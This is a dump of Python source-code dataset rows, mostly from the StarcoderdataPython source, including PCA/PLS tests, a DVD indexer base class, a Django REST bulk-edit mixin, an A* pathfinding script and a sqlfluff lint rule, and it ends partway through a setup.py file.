id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1783442 | <filename>tests/test_nipals.py
import logging
import matplotlib
import numpy as np
import pandas as pd
import pytest
from nipals import nipals
testdata = [
[np.nan, 67, 90, 98, 120],
[np.nan, 71, 93, 102, 129],
[65, 76, 95, 105, 134],
[50, 80, 102, 130, 138],
[60, 82, 97, 135, 151],
[65, 89, 106, 137, 153],
[75, 95, 117, 133, 155]
]
testdata_full = [
[50, 67, 90, 98, 120],
[55, 71, 93, 102, 129],
[65, 76, 95, 105, 134],
[50, 80, 102, 130, 138],
[60, 82, 97, 135, 151],
[65, 89, 106, 137, 153],
[75, 95, 117, 133, 155]
]
testdata_class = pd.DataFrame(testdata)
testdata_class['C1'] = [0, 0, 1, 1, 1, 0, 0]
testdata_class['C2'] = [1, 1, 0, 0, 0, 1, 1]
testdata_class = testdata_class.set_index(['C1', 'C2'], append=True)
yarn = pd.read_csv("tests/yarn.csv", index_col=0)
yarn_scores = pd.read_csv("tests/yarn_scores.csv", index_col=0).values
yarn_loadings = pd.read_csv("tests/yarn_loadings.csv", index_col=0).values
yarn_weights = pd.read_csv("tests/yarn_weights.csv", index_col=0).values
yarn_missing_scores = pd.read_csv("tests/yarn_missing_scores.csv", index_col=0, usecols=[0, 2, 3, 4]).values
yarn_missing_loadings = pd.read_csv("tests/yarn_missing_loadings.csv", index_col=0).values
yarn_missing_weights = pd.read_csv("tests/yarn_missing_weights.csv", index_col=0).values
oliveoil = pd.read_csv("tests/oliveoil.csv", index_col=0)
oliveoil_scores = pd.read_csv("tests/oliveoil_scores.csv", index_col=0)
oliveoil_missing_y = pd.read_csv("tests/oliveoil_miss.csv", index_col=0)
oliveoil_missing_y_scores = pd.read_csv("tests/oliveoil_miss_scores.csv", index_col=0)
# Set matplotlib backend to allow for headless testing
matplotlib.use('Agg')
def test_init_from_df():
# It should be possible to init a nipals class from a Pandas DataFrame
assert nipals.Nipals(pd.DataFrame(testdata)).__class__ == nipals.Nipals
def test_init_from_data():
# It should be possible to init a nipals class from something that
# can be made into a Pandas DataFrame
assert nipals.Nipals(testdata).__class__ == nipals.Nipals
def test_run_pca():
nip = nipals.Nipals(testdata)
# Set startcol to get same results as R nipals:nipals (rounding errors give slightly different rotation otherwise)
assert nip.fit(startcol=1)
np.testing.assert_almost_equal(list(nip.eig), [
4.876206673116805,
2.044242214135278,
1.072810327696312,
0.23701331933712338,
0.14325051166784325
])
# Also run without startcol set to make sure that it works as well. But compare to self data
assert nip.fit()
np.testing.assert_almost_equal(list(nip.eig), [
4.876216689582536,
2.044275687396918,
1.072805497059184,
0.23696073749622645,
0.14327789003413574
])
def test_call_with_too_large_ncomp(caplog):
nip = nipals.Nipals(testdata)
assert nip.fit(ncomp=10)
assert caplog.record_tuples == [
(
'root',
logging.WARNING,
'ncomp is larger than the max dimension of the x matrix.\n'
'fit will only return 5 components'
),
]
def test_run_pca_without_na():
nip = nipals.Nipals(testdata_full)
assert nip.fit()
np.testing.assert_almost_equal(list(nip.eig), [
5.020518433605382,
1.879323465996815,
1.1081766447275905,
0.17225187199265019,
0.06936702860594454
])
def test_fail_from_maxiter():
nip = nipals.Nipals(testdata_full)
with pytest.raises(RuntimeError):
nip.fit(maxiter=1)
def test_run_pca_with_set_ncomp():
nip = nipals.Nipals(testdata_full)
assert nip.fit(ncomp=2)
np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
def test_run_pca_with_precentered_data():
centered = pd.DataFrame(testdata_full)
centered = centered - centered.mean()
nip = nipals.Nipals(centered)
assert nip.fit(center=False, ncomp=2)
np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
def test_run_pca_with_prescaled_data():
scaled = pd.DataFrame(testdata_full)
scaled = (scaled - scaled.mean()) / scaled.std(ddof=1)
nip = nipals.Nipals(scaled)
assert nip.fit(center=False, scale=False, ncomp=2)
np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
def test_run_pca_check_scores_with_sweep():
nip = nipals.Nipals(testdata)
assert nip.fit(ncomp=2, eigsweep=True, startcol=1)
np.testing.assert_almost_equal(nip.scores.values, [
[-0.5585132, 0.1224190],
[-0.3801627, 0.1703718],
[-0.2026926, 0.3163937],
[-0.0337608, -0.6915786],
[0.1285239, -0.4501362],
[0.3562110, -0.2048250],
[0.5982563, 0.3647261],
], 3)
def test_run_pca_check_scores():
nip = nipals.Nipals(testdata)
assert nip.fit(ncomp=2)
np.testing.assert_almost_equal(nip.scores.values, [
[-2.72332498, 0.25021637],
[-1.85369271, 0.34827344],
[-0.98854112, 0.64658032],
[-0.16429534, -1.41375825],
[0.62686116, -0.92008715],
[1.7370958, -0.41837244],
[2.91721621, 0.746181]
])
def test_predict_from_pca():
nip = nipals.Nipals(testdata)
nip.fit(ncomp=2)
assert nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
]))
np.testing.assert_almost_equal(
nip.pred.values,
[
[-1.4465766, 0.4500705],
[-1.6229739, -0.340578]
]
)
def test_predict_from_pca_precentered():
centered = pd.DataFrame(testdata_full)
origmean = centered.mean()
centered = centered - origmean
nip = nipals.Nipals(centered)
assert nip.fit(center=False, ncomp=2)
# assert nip.fit(center=True, ncomp=2)
np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
predtest = pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
])
predtest = predtest - origmean
assert nip.predict(predtest)
np.testing.assert_almost_equal(
nip.pred.values,
[
[-1.2749312, 0.7863909],
[-1.5595433, 0.0705577]
]
)
def test_predict_from_pca_prescaled():
scaled = pd.DataFrame(testdata_full)
origstd = scaled.std(ddof=1)
scaled = scaled / origstd
nip = nipals.Nipals(scaled)
assert nip.fit(scale=False, ncomp=2)
# assert nip.fit(center=True, ncomp=2)
np.testing.assert_almost_equal(list(nip.eig), [5.020518433605, 1.879323465996])
predtest = pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
])
predtest = predtest / origstd
assert nip.predict(predtest)
np.testing.assert_almost_equal(
nip.pred.values,
[
[-1.2749312, 0.7863909],
[-1.5595433, 0.0705577]
],
3
)
def test_predict_from_pca_with_sweep():
nip = nipals.Nipals(testdata)
nip.fit(ncomp=2, eigsweep=True)
assert nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
]))
np.testing.assert_almost_equal(
nip.pred.values,
[
[-0.2966596, 0.2201614],
[-0.3328347, -0.1666008]
]
)
def test_pca_zerovar():
tmpx = pd.DataFrame(testdata)
tmpx.loc[:, 'extra'] = 2.0
pca = nipals.Nipals(tmpx)
with pytest.raises(ValueError) as e_info:
pca.fit(2)
assert e_info.match("zero variance in column.*extra")
assert pca.fit(2, dropzerovar=True)
def test_plot():
nip = nipals.Nipals(testdata)
nip.fit(ncomp=2)
plt = nip.plot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_plot_classes():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
plt = nip.plot(classlevels=['C1', 'C2'])
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_plot_classoptions():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
plt = nip.plot(classlevels=['C1', 'C2'], markers=['s', 'o'], classcolors=['red', 'black'])
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pred_plot():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
]))
plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True)
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_plot_labels():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124],
[51, 82, 102, 110, 108]
], index=['a', 'b']))
plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, labels='C1', predlabels=0)
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pred_plot_labels():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124, 0, 1, 0],
[51, 82, 102, 110, 108, 1, 0, 0]
], index=['a', 'b']).set_index([5, 6, 7], append=True))
plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, labels='C1', predlevels=[5, 6], predlabels=0)
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pred_plot_options():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
nip.predict(pd.DataFrame([
[63, 70, 98, 110, 124, 0, 1, 0],
[51, 82, 102, 110, 108, 1, 0, 0]
]).set_index([5, 6, 7], append=True))
with pytest.raises(KeyError):
plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, predlevels=[5, 7])
plt = nip.plot(classlevels=['C1', 'C2'], plotpred=True, predlevels=[5, 6])
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_loadings_plot():
nip = nipals.Nipals(testdata_class)
nip.fit(ncomp=2)
plt = nip.loadingsplot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pls():
pls = nipals.PLS(yarn.iloc[:, :268], yarn.iloc[:, 268])
assert pls.fit(ncomp=6, scale=False)
np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
np.testing.assert_almost_equal(pls.weights.values, yarn_weights)
def test_pls_nocenter_and_scale():
pls = nipals.PLS(yarn.iloc[:, :268] - yarn.iloc[:, :268].mean(), yarn.iloc[:, 268])
assert pls.fit(ncomp=6, scale=False, center=False)
np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
np.testing.assert_almost_equal(pls.weights.values, yarn_weights)
def test_pls_missing_x():
tmpx = yarn.iloc[:, :268]
csel = [171, 107, 222, 150, 76, 205, 63, 19, 121, 183]
rsel = [23, 0, 3, 22, 15, 21, 19, 7, 19, 5]
for r, c in zip(rsel, csel):
tmpx.iloc[r, c] = np.nan
pls = nipals.PLS(tmpx, yarn.iloc[:, 268])
assert pls.fit(ncomp=3)
np.testing.assert_almost_equal(pls.scores.values, yarn_missing_scores, 5)
np.testing.assert_almost_equal(pls.loadings.values, yarn_missing_loadings)
np.testing.assert_almost_equal(pls.weights.values, yarn_missing_weights)
def test_pls_nondf():
pls = nipals.PLS(yarn.iloc[:, :268].values, yarn.iloc[:, 268].values)
assert pls.fit(ncomp=6, scale=False)
np.testing.assert_almost_equal(pls.scores.values, yarn_scores)
np.testing.assert_almost_equal(pls.loadings.values, yarn_loadings)
np.testing.assert_almost_equal(pls.weights.values, yarn_weights)
def test_pls_optionvariations(caplog):
pls = nipals.PLS(yarn.iloc[:, :268], yarn.iloc[:, 268])
assert pls.fit()
assert pls.fit(ncomp=500, startcol=0)
assert caplog.record_tuples == [
(
'root',
logging.WARNING,
'ncomp is larger than the max dimension of the x matrix.\n'
'fit will only return 28 components'
),
]
with pytest.raises(RuntimeError):
pls.fit(maxiter=1)
def test_pls_multiy():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2)
np.testing.assert_almost_equal(pls.scores.values, oliveoil_scores * [-1, 1], 4)
def test_pls_missing_y():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
np.testing.assert_almost_equal(pls.scores.values, oliveoil_missing_y_scores * [-1, 1], 3)
def test_pls_zerovar_x():
tmpx = oliveoil.iloc[:, :5].copy()
tmpx.loc[:, 'extra'] = 2.0
pls = nipals.PLS(tmpx, oliveoil.iloc[:, 5:])
with pytest.raises(ValueError) as e_info:
pls.fit(2)
assert e_info.match("zero variance in column.*extra")
assert pls.fit(2, dropzerovar=True)
def test_pls_zerovar_y():
tmpy = oliveoil.iloc[:, 5:].copy()
tmpy.loc[:, 'extra'] = 2.0
pls = nipals.PLS(oliveoil.iloc[:, :5], tmpy)
with pytest.raises(ValueError) as e_info:
pls.fit(2)
assert e_info.match("zero variance in column.*extra")
assert pls.fit(2, dropzerovar=True)
def test_pls_score_plot():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.plot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pls_load_plot():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.loadingsplot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pls_load_plot_no_y():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.loadingsplot(showweights=False)
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pls_load_plot_without_labels():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.loadingsplot(labels=False)
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_pls_load_plot_with_markers():
pls = nipals.PLS(oliveoil_missing_y.iloc[:, :5], oliveoil_missing_y.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.loadingsplot(weightmarkers=['s', 'o', 'v', '^', '+', '3'])
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_inf_values_in_dfs(caplog):
olive_inf = oliveoil.replace([18.7, 75.1], np.inf)
nipals.Nipals(olive_inf)
nipals.PLS(olive_inf.iloc[:, :5], olive_inf.iloc[:, 5:])
assert caplog.record_tuples == [
(
'root',
logging.WARNING,
'Data contained infinite values, converting to missing values'
),
(
'root',
logging.WARNING,
'X data contained infinite values, converting to missing values'
),
(
'root',
logging.WARNING,
'Y data contained infinite values, converting to missing values'
),
]
def test_cv_pca():
nip = nipals.Nipals(testdata_class)
assert nip.fit(ncomp=2, cv=True)
assert nip.fit(ncomp=2, cv=4)
np.testing.assert_almost_equal(
nip.R2,
[0.8112004, 0.144992]
)
np.testing.assert_almost_equal(
nip.Q2,
[0.577648, 0.1909286]
)
def test_cv_pca_with_fliped_axis():
"""Checks that the Q2 is approx the same when some cvs have flipped axis in some PC"""
nip = nipals.Nipals(testdata_class)
assert nip.fit(ncomp=2, cv=True, startcol=2)
Q2_sc2 = nip.Q2.values
assert nip.fit(ncomp=2, cv=True)
np.testing.assert_almost_equal(
nip.Q2,
Q2_sc2,
3
)
def test_cv_pls():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2, cv=True)
assert pls.fit(ncomp=2, cv=4)
np.testing.assert_almost_equal(
pls.Q2,
[0.2684853, 0.0644187]
)
np.testing.assert_almost_equal(
pls.R2X,
[0.5826444, 0.2367458]
)
np.testing.assert_almost_equal(
pls.R2Y,
[0.4326835, 0.0856207]
)
def test_dmodx_pca():
nip = nipals.Nipals(testdata_class)
assert nip.fit(ncomp=2)
np.testing.assert_almost_equal(
nip.dModX(),
[
0.5364634, 0.3480396, 0.5702191,
1.5525099, 1.5752593, 0.3275259,
1.1255771
]
)
def test_dmodx_plot_pca():
nip = nipals.Nipals(testdata_class)
assert nip.fit(ncomp=2)
plt = nip.dModXPlot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_overviewplotplot_pca():
nip = nipals.Nipals(testdata_class)
assert nip.fit(ncomp=2)
plt = nip.overviewplot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_dmod_pls():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2)
np.testing.assert_almost_equal(
pls.dModX(),
[
0.8561775, 0.6808639, 1.2475466, 1.9522224,
0.1694258, 0.6151471, 0.8651022, 1.1295028,
1.2212977, 1.2945167, 0.8681262, 1.141947,
0.7637504, 0.3900809, 0.7382779, 0.7063927
]
)
np.testing.assert_almost_equal(
pls.dModY(),
[
0.5728738, 2.0598601, 1.2420525, 0.5257193, 1.4290988, 0.7752674,
1.0029673, 0.8943648, 1.0509669, 0.8511583, 0.7153933, 1.0285289,
0.8238886, 0.4616424, 0.5664762, 0.7409856
]
)
def test_dmodx_plot_pls():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.dModXPlot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_dmody_plot_pls():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.dModYPlot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
def test_overviewplotplot_pls():
pls = nipals.PLS(oliveoil.iloc[:, :5], oliveoil.iloc[:, 5:])
assert pls.fit(ncomp=2)
plt = pls.overviewplot()
assert isinstance(plt, matplotlib.figure.Figure)
return plt
| StarcoderdataPython |
198635 | <reponame>po5/vs-parsedvd
import shutil
import subprocess
import vapoursynth as vs
from pathlib import Path
from abc import ABC, abstractmethod
from typing import Any, Callable, List, Union, Tuple
from ..dataclasses import IndexFileType
core = vs.core
class DVDIndexer(ABC):
"""Abstract DVD indexer interface."""
def __init__(
self, path: Union[Path, str], vps_indexer: Callable[..., vs.VideoNode],
ext: str, force: bool = True, **indexer_kwargs: Any
) -> None:
self.path = Path(path)
self.vps_indexer = vps_indexer
self.ext = ext
self.force = force
self.indexer_kwargs = indexer_kwargs
super().__init__()
@abstractmethod
def get_cmd(self, files: List[Path], output: Path) -> List[str]:
"""Returns the indexer command"""
raise NotImplementedError
@abstractmethod
def get_info(self, index_path: Path, file_idx: int = 0) -> IndexFileType:
"""Returns info about the indexing file"""
raise NotImplementedError
@abstractmethod
def update_idx_file(self, index_path: Path, filepaths: List[Path]) -> None:
raise NotImplementedError
def _check_path(self) -> Path:
if not shutil.which(str(self.path)):
raise FileNotFoundError(f'DVDIndexer: `{self.path}` was not found!')
return self.path
def index(self, files: List[Path], output: Path) -> None:
subprocess.run(
list(map(str, self.get_cmd(files, output))),
check=True, text=True, encoding='utf-8',
stdout=subprocess.PIPE, cwd=files[0].parent
)
def get_idx_file_path(self, path: Path) -> Path:
return path.with_suffix(self.ext)
def file_corrupted(self, index_path: Path) -> None:
if self.force:
try:
index_path.unlink()
except OSError:
raise RuntimeError("IsoFile: Index file corrupted, tried to delete it and failed.")
else:
raise RuntimeError("IsoFile: Index file corrupted! Delete it and retry.")
@staticmethod
def _split_lines(buff: List[str]) -> Tuple[List[str], List[str]]:
split_idx = buff.index('')
return buff[:split_idx], buff[split_idx + 1:]
| StarcoderdataPython |
1620000 | <filename>fpakman/core/flatpak/constants.py
from fpakman.core.constants import CACHE_PATH
FLATHUB_URL = 'https://flathub.org'
FLATHUB_API_URL = FLATHUB_URL + '/api/v1'
FLATPAK_CACHE_PATH = '{}/flatpak/installed'.format(CACHE_PATH)
| StarcoderdataPython |
1646494 | <filename>drf_tweaks/mixins.py
from collections import deque
from rest_framework.exceptions import NotFound, ValidationError
class BulkEditAPIMixin(object):
details_serializer_class = None
# how many items can be edited at once, disabled if None
BULK_EDIT_MAX_ITEMS = None
BULK_EDIT_ALLOW_DELETE_ITEMS = False
def _get_item_id_key(self, item):
"""Items use id for update and delete and temp_id for create"""
for key in ["id", "temp_id"]:
if key in item:
return key
return None
def _get_bulk_edit_items(self, data):
"""Filter out items and put them for update, create or delete"""
items = {"create": {}, "update": {}, "delete": {}}
for request_item in data:
# to create, FE must pass "temp_id" so they will be able to match the response
# in case of any validation errors
id_key = self._get_item_id_key(request_item)
item_id = request_item.get(id_key)
if not isinstance(item_id, int):
continue
if self.BULK_EDIT_ALLOW_DELETE_ITEMS and request_item.get("delete_object"):
change_type = "delete"
elif id_key == "id":
change_type = "update"
elif hasattr(self, "create") and id_key == "temp_id":
change_type = "create"
items[change_type][item_id] = request_item
return items
def _perform_bulk_edit(self, items):
update_delete_ids = set(items["update"].keys()) | set(items["delete"].keys())
update_delete_objects = {item.id: item for item in self.get_queryset().filter(id__in=update_delete_ids)}
update_delete_objects_ids = set(update_delete_objects.keys())
if update_delete_ids != update_delete_objects_ids:
not_found_ids = update_delete_ids - update_delete_objects_ids
raise NotFound(
[{"id": item_id, "non_field_errors": ["This item does not exist."]} for item_id in not_found_ids]
)
errors = []
actions = deque()
for change_type in items:
for item_id, item in items[change_type].items():
if change_type == "create":
instance = None
serializer = self.get_serializer(data=item)
action = serializer.save
elif change_type in ["update", "delete"]:
instance = update_delete_objects[item_id]
serializer = self.get_details_serializer(instance=instance, data=item, partial=True)
action = {"update": serializer.save, "delete": instance.delete}[change_type]
id_key = self._get_item_id_key(item)
if serializer and not serializer.is_valid():
item_error = {id_key: item_id}
item_error.update(serializer.errors)
errors.append(item_error)
continue
# success - change can be made
actions.append(action)
if errors:
raise ValidationError(errors)
# perform actions if valdiation passed
for action in actions:
action()
def get_details_serializer_class(self):
assert self.details_serializer_class is not None, (
f"{self.__class__.__name__} should either include a `details_serializer_class` attribute, "
"or override the `get_details_serializer_class()` method."
)
return self.details_serializer_class
def get_details_serializer(self, *args, **kwargs):
"""Get instance of details serializer for bulk edit"""
serializer_class = self.get_details_serializer_class()
kwargs["context"] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
def put(self, request, *args, **kwargs):
"""Bulk edit for member medications"""
if not isinstance(request.data, list):
raise ValidationError({"non_field_errors": ["Payload for bulk edit must be a list of objects to edit."]})
if self.BULK_EDIT_MAX_ITEMS and len(request.data) > self.BULK_EDIT_MAX_ITEMS:
raise ValidationError(
{"non_field_errors": [f"Cannot edit more than {self.BULK_EDIT_MAX_ITEMS} items at once."]}
)
items = self._get_bulk_edit_items(request.data)
self._perform_bulk_edit(items)
return self.list(request, *args, **kwargs)
| StarcoderdataPython |
21224 | class Node:
"""
A node class used in A* Pathfinding.
parent: it is parent of current node
position: it is current position of node in the maze.
g: cost from start to current Node
h: heuristic based estimated cost for current Node to end Node
f: total cost of present node i.e. : f = g + h
"""
def __init__(self , parent=None , poistion=None):
self.parent = parent
self.position = poistion
self.g = 0
self.f = 0
self.h = 0
def __eq__(self , other):
return self.position == other.position
class FindPath():
def __init__(self , maze , cost , start , end):
self.maze = maze
self.cost = cost
self.start = start
self.end = end
self.move = [ [-1, 0] , # go up
[ 0,-1] , # go left
[ 1, 0] , # go down
[ 0, 1] , # go right
[-1,-1] , # go left-up
[-1, 1] , # go left down
[ 1,-1] , # go right down
[ 1, 1] ] # go right up
def return_path(self,curr_node,cost_matrix):
path = []
no_rows , no_columns = np.shape(cost_matrix)
# here we create the initialized result maze with -1 in every position
res = [[-1 for i in range(no_columns)] for j in range(no_rows)]
#we will iterate over all parents of node and store in path
curr = curr_node
while curr is not None:
path.append(curr.position)
curr = curr.parent
path = path[::-1]
initial_value = 0
# we will insert the path in matrix
for i in range(len(path)):
res[path[i][0]][path[i][1]] = initial_value
initial_value += 1
return res
def search(self):
"""
Returns a list of tuples as a path from the given start to the given end in the given maze
"""
# we will create start node and end node
# we will initialize g, h and f value zero
start_node = Node(None, tuple(self.start))
start_node.g = 0
start_node.h = 0
start_node.f = 0
end_node = Node(None, tuple(self.end))
end_node.g = 0
end_node.h = 0
end_node.f = 0
# we need to initialize both queue and visited list
# we will find the lowest cost node to expand next
queue = []
# we will store all visited node
visited_list = []
# Add the start node
queue.append(start_node)
# calculate the maximiuim number of steps we can move in the matrix
counter = 0
max_steps = (len(self.maze) // 2) ** 10
# Get number of rows and columns
no_rows, no_columns = np.shape(self.maze)
# Loop until you find the end
while len(queue) > 0:
# Every time any node is visited increase the counter
counter += 1
# Get the current node
current_node = queue[0]
current_index = 0
for index, item in enumerate(queue):
if item.f < current_node.f:
current_node = item
current_index = index
# if we hit this point return the path such as it may be no solution or
# computation cost is too high
if counter > max_steps:
print ("Destination cannot be reached")
return self.return_path(current_node , self.maze)
# Pop current node out off
queue.pop(current_index)
# mark it visited
visited_list.append(current_node)
# check if goal is reached or not
if current_node == end_node:
return self.return_path(current_node , self.maze)
# Generate coordinate from all adjacent coordinates
coordinates = []
for move in self.move:
# Get node position
current_node_position = (current_node.position[0] + move[0] , current_node.position[1] + move[1])
# check if all the moves are in maze limit
if (current_node_position[0] > (no_rows - 1) or current_node_position[0] < 0 or current_node_position[1] > (no_columns -1) or current_node_position[1] < 0):
continue
# Make sure walkable terrain
if self.maze[current_node_position[0]][current_node_position[1]] != 0:
continue
# Create new node
new_node = Node(current_node , current_node_position)
# Append
coordinates.append(new_node)
# Loop through children
for child in coordinates:
# Child is on the visited list (search entire visited list)
if len([visited_child for visited_child in visited_list if visited_child == child]) > 0:
continue
# calculate f, g, and h values
child.g = current_node.g + self.cost
# calculated Heuristic costs, this is using eucledian distance
child.h = (((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2))
child.f = child.g + child.h
# Child if already in queue and g cost is already lower
if len([i for i in queue if child == i and child.g > i.g]) > 0:
continue
queue.append(child)
class Preprocess:
def __init__(self , maze , n , m):
self.maze = maze
self.n = n
self.m = m
def check(self , value):
data=''
for i in range(len(value)):
if(value[i] == '[' or value[i] == ']'):
continue
else:
data+=value[i]
return data
def process_text(self):
c=0
matrix = self.maze
matrix = matrix.split(',')
data = []
for i in range(self.n):
l = []
for j in range(self.m):
l.append(int(self.check(matrix[c])))
c += 1
data.append(l)
return data
if __name__ == '__main__':
no_rows = int(input("Enter number of rows: "))
no_cols = int(input("Enter number of columns: "))
matrix = Preprocess(str(input("Enter Matrix: ")) , no_rows , no_cols).process_text()
start_x = int(input("Enter x coordinate of starting node: "))
start_y = int(input("Enter y coordinate of starting node: "))
end_x = int(input("Enter x coordinate of ending node: "))
end_y = int(input("Enter y coordinate of ending node: "))
cost = int(input("Enter cost: "))
start = [start_x , start_y]
end = [end_x , end_y]
path = FindPath(matrix , cost , start , end).search()
if(path != None):
print("Path found: ")
for i in range(len(path)):
for j in range(len(path[i])):
if(path[i][j] == -1):
print(0 , end=" ")
else:
print(path[i][j] , end=" ")
print()
else:
print("No Path found")
#input:
# Enter number of rows: 5
# Enter number of columns: 6
# Enter Matrix: [[0, 1, 0, 0, 0, 0],
# [0, 1, 0, 0, 0, 0],
# [0, 1, 0, 1, 0, 0],
# [0, 1, 0, 0, 1, 0],
# [0, 0, 0, 0, 1, 0]]
# Enter x coordinate of starting node: 0
# Enter y coordinate of starting node: 0
# Enter x coordinate of ending node: 4
# Enter y coordinate of ending node: 5
# Enter cost: 1
#Path found:
# 0 0 0 0 0 0
# 1 0 0 0 0 0
# 2 0 0 0 7 0
# 3 0 0 6 0 8
# 0 4 5 0 0 9
| StarcoderdataPython |
3247872 | <filename>3/3-9.py
#-*- coding:utf-8 -*-
welcome_person = ['<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>']
for person in welcome_person:
print('welcome to my home to eat dinner,' + person)
print(welcome_person[4] + "don't have time!")
welcome_person[4] = '<NAME>'
for person in welcome_person:
print('welcome to my home to eat dinner,' + person)
print('I find a bigger zhuozi!')
welcome_person.insert(0, '<NAME>')
welcome_person.insert(3, '<NAME>')
welcome_person.append('fa ge')
for person in welcome_person:
print('welcome to my home to eat dinner,' + person)
print("I'm sorry to said that i can only welcome 2 people!")
while len(welcome_person) > 2:
people = welcome_person.pop()
print('sorry,' + people + '我们下次再约!')
for last_people in welcome_person:
print('welcome to my home to eat dinner,' + last_people)
# print(range(len(welcome_person)))
print('-------------------')
print(len(welcome_person))
print('-------------------')
del welcome_person[0:2]
print(welcome_person)
print(type(welcome_person)) | StarcoderdataPython |
1736864 | """Implementation of Rule L009."""
from ..base import BaseCrawler, LintResult, LintFix
from ..doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L009(BaseCrawler):
"""Files must end with a trailing newline."""
def _eval(self, segment, siblings_post, parent_stack, **kwargs):
"""Files must end with a trailing newline.
We only care about the segment and the siblings which come after it
for this rule, we discard the others into the kwargs argument.
"""
if len(self.filter_meta(siblings_post)) > 0:
# This can only fail on the last segment
return None
elif len(segment.segments) > 0:
# This can only fail on the last base segment
return None
elif segment.name == "newline":
# If this is the last segment, and it's a newline then we're good
return None
elif segment.is_meta:
# We can't fail on a meta segment
return None
else:
# so this looks like the end of the file, but we
# need to check that each parent segment is also the last
file_len = len(parent_stack[0].raw)
pos = segment.pos_marker.char_pos
# Does the length of the file, equal the length of the segment plus its position
if file_len != pos + len(segment.raw):
return None
ins = self.make_newline(pos_marker=segment.pos_marker.advance_by(segment.raw))
# We're going to make an edit because otherwise we would never get a match!
return LintResult(
anchor=segment, fixes=[LintFix("edit", segment, [segment, ins])]
)
| StarcoderdataPython |
95350 | <filename>constants.py
import numpy as np
def get_constants():
return {
'background_cleaning': {
'lower_white': np.array([0, 0, 0], dtype=np.uint8),
'upper_white': np.array([180, 10, 255], dtype=np.uint8),
'angles': list(range(-15, 15)),
'left_book_start_threshold': 800,
'right_book_start_threshold': 800,
'donot_alter_angle_threshold': 1000,
'ignore_fraction': 0.25,
'gradient': 25,
'mean_factor': 0.7,
'score_multiplier': [1, 0.8, 0.5, 0.3, 0.1],
},
'split_image': {
'bin_size': 5,
}
}
| StarcoderdataPython |
1765198 | from distutils.core import setup
setup(
name="needs",
packages=["needs"],
version="1.0.9",
description="Boolean Contexts",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/astex/needs",
keywords=["context", "permissions", "needs", "roles"],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3",
